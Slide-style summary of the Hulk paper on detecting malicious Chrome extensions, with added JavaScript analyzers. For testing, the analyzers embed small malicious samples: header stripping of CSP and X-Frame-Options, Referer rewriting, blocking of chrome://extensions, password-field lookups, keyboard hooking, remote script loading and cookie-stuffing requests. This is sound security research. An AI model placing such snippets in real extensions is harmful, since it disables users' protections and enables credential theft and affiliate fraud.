Hulk: Eliciting Malicious Behavior in Browser Extensions. Alexandros Kapravelos◊, Chris Grier†*, Neha Chachra‡, Christopher Kruegel◊, Giovanni Vigna◊, Vern Paxson†*. ◊UC Santa Barbara, †UC Berkeley, ‡UC San Diego, *International Computer Science Institute. 23rd USENIX Security Symposium (Aug. 2014)
Outline • Introduction • Background • Architecture • Results • Profiting from maliciousness • Recommendations • Related work
Introduction • All major web browsers today support broad extension ecosystems that let third parties modify browser behavior or add functionality. • Some browsers run online web stores to distribute extensions to users. • In this paper, we examine extensions for Google Chrome that are designed with malicious intent.
Installing extensions • Extensions can be installed via the official Chrome Web Store, manually by the user, or sideloaded by third-party programs. • Chrome version 25 (Feb. 2013) included changes to prevent silent installation of Chrome extensions, requiring user confirmation. • Chrome version 35 (May 2014) took further steps against sideloading by requiring all installed extensions to be hosted in the Chrome Web Store.
Extension permissions • Chrome requires extensions to list in their manifest the permissions needed to access the different parts of the extension API. • webRequest: allows the extension to "observe and analyze traffic and to intercept, block, or modify requests in-flight" (blocking or modifying a request additionally requires the webRequestBlocking permission).
Architecture • Hulk dynamically loads extensions in a monitored environment and observes how they interact with the loaded web pages. • Using a set of heuristics to identify potentially dangerous behavior, it labels extensions as malicious, suspicious, or benign. • Extensions are installed automatically and their activity during web browsing is recorded in an instrumented browser.
URL extraction • Look for URLs in the manifest, and search for URLs in the source code as well. • Also visit a set of popular websites that may be targeted by a malicious extension.
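The extraction step above, as an added example (this is not code from the Hulk paper): it collects host patterns from the manifest's permissions and content-script matches, pulls literal URLs out of the source, and matches the host patterns against a seed list of popular sites to decide which pages the analyzer should visit. It also flags patterns whose host component is a bare wildcard, the kind of broad grant the results section later reports. The manifest, source snippet and seed list are constructed for this example; the match-pattern grammar is Chrome's documented one.

```javascript
// Added example, not code from the Hulk paper: pull the URLs an extension
// declares or embeds, and match its host patterns against a seed list of
// popular sites so the analyzer knows which pages to visit. The manifest,
// source snippet and seed list are constructed for this example.

const MANIFEST = {
  name: "Example Helper",
  permissions: ["webRequest", "webRequestBlocking", "*://*.example-shop.com/*", "http://*/*"],
  content_scripts: [{ matches: ["https://*.facebook.com/*"], js: ["inject.js"] }],
};

const SOURCE = `
  var api = "https://cdn.example-ads.net/loader.js?v=3";
  fetch('http://track.example-ads.net/ping');
`;

const SEED_SITES = [
  "https://www.facebook.com/",
  "https://www.google.com/",
  "https://shop.example-shop.com/cart",
  "http://news.example.org/",
];

const escapeRe = s => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

// Chrome match-pattern grammar: <scheme>://<host><path>, where scheme may be
// "*" (http or https), host may be "*" or "*.domain", and "*" in the path
// matches anything. "<all_urls>" is the catch-all.
const PATTERN = /^(\*|https?|ftp|file):\/\/(\*|\*\.[^/*]+|[^/*]+)?(\/.*)$/;

function patternToRegExp(pattern) {
  if (pattern === "<all_urls>") return /^(https?|ftp|file):\/\/.*/;
  const m = PATTERN.exec(pattern);
  if (!m) return null; // malformed: Chrome would refuse to load the manifest
  const scheme = m[1] === "*" ? "https?" : m[1];
  let host;
  if (m[2] === undefined || m[2] === "*") host = "[^/]*";
  else if (m[2].startsWith("*.")) host = "([^/]*\\.)?" + escapeRe(m[2].slice(2));
  else host = escapeRe(m[2]);
  const path = escapeRe(m[3]).replace(/\\\*/g, ".*");
  return new RegExp(`^${scheme}://${host}${path}$`);
}

// Host permissions live in "permissions" (anything that looks like a URL
// pattern) and in each content script's "matches".
function hostPatternsOf(manifest) {
  const fromPerms = (manifest.permissions || []).filter(p => p === "<all_urls>" || p.includes("://"));
  const fromScripts = (manifest.content_scripts || []).flatMap(cs => cs.matches || []);
  return [...new Set([...fromPerms, ...fromScripts])];
}

// A pattern is "broad" when its host component is a bare wildcard.
function isBroadHostPattern(pattern) {
  if (pattern === "<all_urls>") return true;
  const m = PATTERN.exec(pattern);
  return !!m && m[2] === "*";
}

// Literal URLs in the source; URLs built at runtime are missed here, which is
// why the network log is still needed.
function extractUrls(text) {
  return [...new Set(text.match(/https?:\/\/[^\s'"`<>)]+/g) || [])];
}

function sitesToVisit(patterns, seeds) {
  const res = patterns.map(patternToRegExp).filter(Boolean);
  return seeds.filter(u => res.some(re => re.test(u)));
}

function analyzeExtension(manifest, source, seeds) {
  const hostPatterns = hostPatternsOf(manifest);
  return {
    hostPatterns,
    broad: hostPatterns.filter(isBroadHostPattern),
    urls: extractUrls(source),
    visit: sitesToVisit(hostPatterns, seeds),
  };
}

console.log(JSON.stringify(analyzeExtension(MANIFEST, SOURCE, SEED_SITES), null, 2));
```

For the constructed manifest, `http://*/*` is reported as broad, the two literal ad-network URLs are recovered from the source, and three of the four seed sites match a declared host pattern (google.com does not, so it is not worth visiting for this extension).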
Event-based execution • HoneyPages will not trigger callbacks for network events that require special properties, such as a specific URL or HTTP header. • By invoking every event callback an extension registers with the chrome.webRequest API, using mock event objects that point to a background HoneyPage, we can monitor the changes the extension attempts to make.
Content scripts • By intercepting all additional code the extension introduces into the context of the visited page, we can monitor whether the extension fetches remote scripts.
Network logging • Request URLs may be computed at runtime. • We use a transparent proxy that intercepts all browser HTTP and DNS traffic to log the requests made during extension execution.
Detecting malicious behavior • Extension API: • Uninstalling other extensions. • Preventing uninstallation of the current extension (blocking chrome://extensions). • Manipulating HTTP headers: removing a security-related HTTP header, such as Content-Security-Policy or X-Frame-Options, is classified as malicious.
Network level • Request errors (suspicious). • May be used for drive-by downloads. • Modification of HTTP requests (malicious). • Commonly seen on shopping-related extensions. • Header modification is detected by comparing the packets received by the OS with those seen by the browser.
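The event-based execution step and the header-manipulation checks above, combined into one added example (not code from the Hulk paper). A stand-in for chrome.webRequest records every listener a background script registers, fires each one with a constructed mock event for a HoneyPage URL and for chrome://extensions, and diffs the headers the listener hands back against the headers it was given. Removing a security header is labelled malicious, as in the paper; the probe URLs, the header sets, the Referer rule, the two extra headers in the list and the sample extension are this example's own assumptions.

```javascript
// Added example, not code from the Hulk paper: a stand-in for chrome.webRequest
// that records the listeners an extension registers, fires each one with a
// constructed mock event, and diffs the headers it hands back against the
// headers it was given. Probe URLs, header sets and the sample extension at
// the bottom are all constructed for this example.

// Headers whose removal is treated as malicious. CSP and X-Frame-Options are
// the paper's examples; the other two are this example's additions.
const SECURITY_HEADERS = new Set([
  "content-security-policy", "x-frame-options",
  "strict-transport-security", "x-content-type-options",
]);
const PROBE_URLS = ["https://honey.test/", "chrome://extensions/"];
const RANK = { benign: 0, suspicious: 1, malicious: 2 };

// Minimal chrome.webRequest look-alike: addListener only stores the callback.
function makeWebRequestMock() {
  const listeners = {};
  const api = {};
  for (const ev of ["onBeforeRequest", "onBeforeSendHeaders", "onHeadersReceived"]) {
    listeners[ev] = [];
    api[ev] = { addListener: (cb, filter, extra) => listeners[ev].push({ cb, filter, extra: extra || [] }) };
  }
  return { api, listeners };
}

// Mock "details" object shaped like the real one for the given event.
function mockEvent(ev, url) {
  const d = { requestId: "1", url, method: "GET", type: "main_frame", tabId: 1, frameId: 0, timeStamp: 0 };
  if (ev === "onBeforeSendHeaders")
    d.requestHeaders = [{ name: "Referer", value: "https://honey.test/" }, { name: "User-Agent", value: "Mozilla/5.0" }];
  if (ev === "onHeadersReceived")
    d.responseHeaders = [
      { name: "Content-Security-Policy", value: "default-src 'self'" },
      { name: "X-Frame-Options", value: "DENY" },
      { name: "Content-Type", value: "text/html" },
    ];
  return d;
}

function diffHeaders(before, after) {
  const idx = hs => new Map(hs.map(h => [h.name.toLowerCase(), h.value]));
  const a = idx(before), b = idx(after);
  return {
    removed: [...a.keys()].filter(k => !b.has(k)),
    modified: [...a.keys()].filter(k => b.has(k) && b.get(k) !== a.get(k)),
    added: [...b.keys()].filter(k => !a.has(k)),
  };
}

function classify(ev, d) {
  if (d.removed.some(h => SECURITY_HEADERS.has(h))) return "malicious";
  if (ev === "onBeforeSendHeaders" && (d.modified.includes("referer") || d.added.includes("referer"))) return "malicious";
  return d.removed.length || d.modified.length || d.added.length ? "suspicious" : "benign";
}

// Fire every registered listener with every probe URL and record what it did.
function exercise(listeners) {
  const findings = [];
  for (const [ev, regs] of Object.entries(listeners)) {
    for (const { cb } of regs) {
      for (const url of PROBE_URLS) {
        const event = mockEvent(ev, url);
        const key = ev === "onHeadersReceived" ? "responseHeaders" : "requestHeaders";
        const before = JSON.parse(JSON.stringify(event[key] || []));
        let result;
        try { result = cb(event); }
        catch (err) { findings.push({ ev, url, label: "suspicious", reason: "listener threw: " + err.message }); continue; }
        if (result && result.cancel && url.startsWith("chrome://extensions")) {
          findings.push({ ev, url, label: "malicious", reason: "blocks chrome://extensions (prevents uninstallation)" });
          continue;
        }
        if (result && result.redirectUrl) {
          findings.push({ ev, url, label: "suspicious", reason: "redirects to " + result.redirectUrl });
          continue;
        }
        // Listeners may return new headers or mutate the event in place.
        const after = (result && result[key]) || event[key] || [];
        const diff = diffHeaders(before, after);
        findings.push({ ev, url, label: classify(ev, diff), diff });
      }
    }
  }
  return findings;
}

function overallLabel(findings) {
  return findings.reduce((worst, f) => (RANK[f.label] > RANK[worst] ? f.label : worst), "benign");
}

// Constructed sample extension background script: strips CSP/XFO, rewrites
// the Referer, and blocks navigation to chrome://extensions.
function loadSampleExtension(chrome) {
  chrome.webRequest.onHeadersReceived.addListener(details => ({
    responseHeaders: details.responseHeaders.filter(h => !/^(content-security-policy|x-frame-options)$/i.test(h.name)),
  }), { urls: ["<all_urls>"] }, ["blocking", "responseHeaders"]);
  chrome.webRequest.onBeforeSendHeaders.addListener(details => {
    const ref = details.requestHeaders.find(h => h.name.toLowerCase() === "referer");
    if (ref) ref.value = "https://partner.example/aff?id=123";
    else details.requestHeaders.push({ name: "Referer", value: "https://partner.example/aff?id=123" });
    return { requestHeaders: details.requestHeaders };
  }, { urls: ["<all_urls>"] }, ["blocking", "requestHeaders"]);
  chrome.webRequest.onBeforeRequest.addListener(details => {
    if (details.url.startsWith("chrome://extensions")) return { cancel: true };
  }, { urls: ["<all_urls>"] }, ["blocking"]);
}

function runDemo() {
  const { api, listeners } = makeWebRequestMock();
  loadSampleExtension({ webRequest: api });
  const findings = exercise(listeners);
  return { findings, label: overallLabel(findings) };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The diff is taken against a deep copy of the headers because a blocking listener may either return a replacement array or edit the one it was handed; checking only the return value would miss the second style. Firing the same listener with chrome://extensions as the URL is what exposes the uninstall-blocking behaviour, which a HoneyPage alone would never trigger.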
Injected Content Analysis • The injected script runs in the context of the visited page and thus has full access to its DOM tree. • By using HoneyPages, we can understand the injected scripts’ intentions. • For example, if the injected code looks for a form field with the name “password,” it is classified as malicious.
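A HoneyPage-style document, as an added example that is not code from the Hulk paper. Every DOM query an injected script makes is answered with a mock element and logged, so the analyst can classify the script from what it went looking for. Queries return further mock elements, so multi-step lookups (form, then field, then value) also resolve; the paper notes its own HoneyPages did not yet support that. The password-field rule is the paper's; the keyboard-hook and remote-script rules, the `document`/`window` stand-ins and the three injected scripts are this example's own constructions.

```javascript
// Added example, not code from the Hulk paper: a HoneyPage-style document that
// answers every DOM query an injected script makes, logs the query, and lets
// the analyst classify the script by what it went looking for. The injected
// scripts at the bottom are constructed samples, and the classification rules
// other than the password-field one are this example's own assumptions.

function makeHoneyPage() {
  const log = []; // every query, listener registration, read and mutation
  const record = (kind, target, detail) => log.push({ kind, target, detail });

  // Every query returns another honey element, so multi-step lookups such as
  // document.forms[0].querySelector("input[type=password]").value resolve
  // instead of throwing on null.
  function honeyElement(selector) {
    const node = {
      selector,
      value: "", innerText: "", textContent: "", innerHTML: "", src: "", href: "",
      querySelector: sel => { record("query", selector, sel); return honeyElement(sel); },
      querySelectorAll: sel => { record("query", selector, sel); return [honeyElement(sel)]; },
      getElementById: id => { record("query", selector, "#" + id); return honeyElement("#" + id); },
      getElementsByName: n => { record("query", selector, `[name="${n}"]`); return [honeyElement(`[name="${n}"]`)]; },
      getElementsByTagName: t => { record("query", selector, t); return [honeyElement(t)]; },
      createElement: tag => honeyElement(tag),
      addEventListener: type => record("listener", selector, type),
      appendChild: child => { record("mutate", selector, "appendChild " + (child.selector || "?")); return child; },
      setAttribute: (k, v) => record("set", selector, `${k}=${v}`),
    };
    return new Proxy(node, {
      // Unknown properties (body, head, forms, style, ...) become nested honey
      // elements so the script keeps running; the read is logged.
      get(t, prop) {
        if (typeof prop !== "string" || prop in t) return t[prop];
        record("read", selector, prop);
        return honeyElement(`${selector}.${prop}`);
      },
      set(t, prop, v) {
        record("set", selector, `${String(prop)}=${String(v)}`);
        t[prop] = v;
        return true;
      },
    });
  }
  return { document: honeyElement("document"), log };
}

const CREDENTIAL_FIELD = /passw|pwd|card.?number|cvv|cvc/i;

function classifyInjectedScript(log) {
  const reasons = [];
  for (const e of log) {
    // The paper's rule: looking up a password field is malicious.
    if (e.kind === "query" && CREDENTIAL_FIELD.test(e.detail))
      reasons.push({ label: "malicious", why: `looks up credential field ${e.detail}` });
    // Assumption: hooking keyboard events on the whole document is suspicious.
    if (e.kind === "listener" && e.target === "document" && /^key(down|up|press)$/.test(e.detail))
      reasons.push({ label: "suspicious", why: `hooks ${e.detail} on the whole document` });
    // Assumption: pointing a script element at a remote origin is suspicious.
    if (e.kind === "set" && e.target === "script" && /^src=https?:\/\//.test(e.detail))
      reasons.push({ label: "suspicious", why: "loads remote " + e.detail });
  }
  const label = reasons.some(r => r.label === "malicious") ? "malicious" : reasons.length ? "suspicious" : "benign";
  return { label, reasons };
}

// Run injected code against a fresh HoneyPage and classify it.
function analyzeInjected(code) {
  const page = makeHoneyPage();
  try {
    new Function("document", "window", code)(page.document, { document: page.document });
  } catch (err) {
    page.log.push({ kind: "error", target: "script", detail: err.message });
  }
  return { ...classifyInjectedScript(page.log), log: page.log };
}

// Constructed injected scripts: a credential stealer, a remote loader, a benign tweak.
const SAMPLES = {
  stealer: `var p = document.querySelector('input[name="password"]');
    document.addEventListener('keydown', function (e) { /* exfiltrate e.key */ });
    var v = document.forms[0].querySelector('input[type=password]').value;`,
  loader: `var s = document.createElement('script');
    s.src = 'https://cdn.example-ads.net/loader.js';
    document.head.appendChild(s);`,
  benign: `var h = document.getElementById('header'); h.style.display = 'none';`,
};

for (const [name, code] of Object.entries(SAMPLES))
  console.log(name, analyzeInjected(code).label);
```

The point of answering every query is that the injected script keeps executing down whichever branch it was written for, so its intent shows up in the log even though no real page was loaded. A script that throws is recorded rather than crashing the analyzer, since a crash would itself be a way for an extension to evade analysis.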
Results • Two sources of extensions: • The official Chrome Web Store (totaling 47,940 extensions). • Extensions sideloaded by binaries (392 unique extensions, obtained from binaries run in the Anubis sandbox). • Hulk labeled 130 as malicious and 4,712 as suspicious. • The permissions requested by benign extensions do not differ significantly from those requested by malicious/suspicious ones.
Permissions used • Most commonly used permissions:
Permissions used • 18,313 extensions use host permissions, which restrict the pages on which the extension can use the privileged chrome.* API. • Extensions typically request broad permissions using wildcards in URL patterns.
API calls • Top 15 Chrome extension API calls made by extensions during the experiments.
Extension management • Several extensions on the Chrome Web Store prevent uninstallation. • "HD Video Player" (7,173 users). • "SmartScreenVideo Plugin" (11,012 users). • "No Tab Left Behind" (only 8 users) (false positive).
Code injection • More than 3,000 extensions dynamically introduced remotely-retrieved code, either through script injections or by invoking eval. • An extension named "Bang5TaoShopping assistant" (5.6M users) injects code into every visited page.
Profiting from maliciousness • Ad manipulation: • The addition of new ads, as well as the replacement of existing ads (or their identifiers) with images of the same size. • "SimilarSites Pro" (1.8M users) used obfuscated scripts to replace ads (728x90) on popular websites. • Other similar scripts, all under a company called "SimilarGroup."
Profiting from maliciousness • Affiliate fraud: • Many major merchant web sites, such as amazon.com, godaddy.com, and ebay.com, run affiliate programs. • Affiliate programs usually associate a cookie with the user's browser. • Malicious extensions do "cookie stuffing": a technique that causes the user's browser to visit the merchant's affiliate URLs without the user clicking on an affiliate link. • "Split Screen" (52K users) sets the Referer header on requests. • "Give as you Live" (11K users) uses the same mechanism, but for a charity campaign.
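A cookie-stuffing detector over a proxy log, as an added example (not code from the Hulk paper). The log format is this example's own: one record per request with the URL, the resource type and the initiator, which a transparent proxy plus browser instrumentation could supply. The rule applied is an assumption, not the paper's heuristic: a request carrying an affiliate parameter is cookie stuffing when it was not a user-driven top-level navigation, i.e. it came from the extension itself or was loaded as a hidden sub-resource. The merchant table is illustrative (`tag` is the Amazon Associates parameter and `campid` the eBay Partner Network campaign id); the log records and tag values are constructed.

```javascript
// Added example, not code from the Hulk paper: a cookie-stuffing detector over a
// constructed proxy log. Each record is one request as the proxy would see it;
// the field names are this example's own, not Hulk's log format. The affiliate
// parameter table is illustrative and should be extended per merchant.

const AFFILIATE_PARAMS = {
  "amazon.com": ["tag"],   // Amazon Associates tracking id
  "ebay.com": ["campid"],  // eBay Partner Network campaign id
};

// Return { merchant, param, value } when the URL carries an affiliate tag.
function affiliateParamOf(urlString) {
  let url;
  try { url = new URL(urlString); } catch (e) { return null; }
  for (const [merchant, params] of Object.entries(AFFILIATE_PARAMS)) {
    if (url.hostname === merchant || url.hostname.endsWith("." + merchant)) {
      const p = params.find(name => url.searchParams.has(name));
      if (p) return { merchant, param: p, value: url.searchParams.get(p) };
    }
  }
  return null;
}

// Assumption: a tagged request is cookie stuffing when it was not a top-level
// navigation (the user did not click anything) or when the extension itself
// issued it from its background page.
function isCookieStuffing(rec) {
  const aff = affiliateParamOf(rec.url);
  if (!aff) return null;
  const fromExtension = /^chrome-extension:\/\//.test(rec.initiator || "");
  const hidden = rec.type !== "main_frame";
  if (fromExtension || hidden) return { ...aff, type: rec.type, initiator: rec.initiator };
  return null;
}

function detectCookieStuffing(log) {
  const hits = log.map(isCookieStuffing).filter(Boolean);
  const byTag = {};
  for (const h of hits) {
    const key = `${h.merchant}:${h.value}`;
    byTag[key] = (byTag[key] || 0) + 1;
  }
  return { hits, byTag, label: hits.length ? "malicious" : "benign" };
}

// Constructed log: one legitimate affiliate click and three stuffing attempts.
const SAMPLE_LOG = [
  { url: "https://www.example-blog.test/review", type: "main_frame", initiator: null },
  // user clicks a real affiliate link on the review page: a normal top-level navigation
  { url: "https://www.amazon.com/dp/B000000000?tag=blogger-20", type: "main_frame", initiator: "https://www.example-blog.test" },
  // extension loads the merchant with its own tag in a hidden iframe on an unrelated page
  { url: "https://www.amazon.com/?tag=stuffer-20", type: "sub_frame", initiator: "https://news.example.test" },
  // the extension's background page fetches the eBay campaign URL directly
  { url: "https://rover.ebay.com/rover/?campid=5338000000", type: "xmlhttprequest", initiator: "chrome-extension://abcdefghijklmnopabcdefghijklmnop" },
  // same Amazon tag again, this time as an invisible image
  { url: "https://www.amazon.com/?tag=stuffer-20", type: "image", initiator: "https://other.example.test" },
];

console.log(JSON.stringify(detectCookieStuffing(SAMPLE_LOG), null, 2));
```

Grouping hits by merchant and tag value is what turns individual requests into evidence: the same affiliate id showing up across unrelated pages, from hidden frames and images, is the signature of stuffing, while a single tagged top-level navigation from a review page is an ordinary affiliate click and is left alone.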
Profiting from maliciousness • Information theft. • Online social network abuse: • Extensions use the browser's existing authentication data (session cookies) to interact with online social networks on the user's behalf. • "WhasApp", an extension sideloaded by malware, spams Facebook and Tumblr.
Recommendations • Extensions should not have the ability to manipulate browser configuration pages, such as chrome://extensions. • Extensions should also not be allowed to uninstall other extensions. • Extensions should not be allowed to remove HTTP security-related headers. • Extensions should not have the ability to hook all keyboard events on a given site.
Limitations • Hulk relies on dynamic analysis to analyze extensions. • It cannot address cloaking that loads different code based on the client's location or time. • It cannot observe behavior that depends on specific targets. • Hulk's HoneyPages do not currently support multistep querying of DOM elements.
Related work • Anubis: malware analysis for unknown binaries. • Further work has examined how well the Chrome extension architecture prevents damage and how well developers request the correct privileges for their extensions. • The current permission system does not prevent an overly privileged malicious extension from executing malicious code. • An adware vendor may purchase an existing extension and push a malicious update to its users.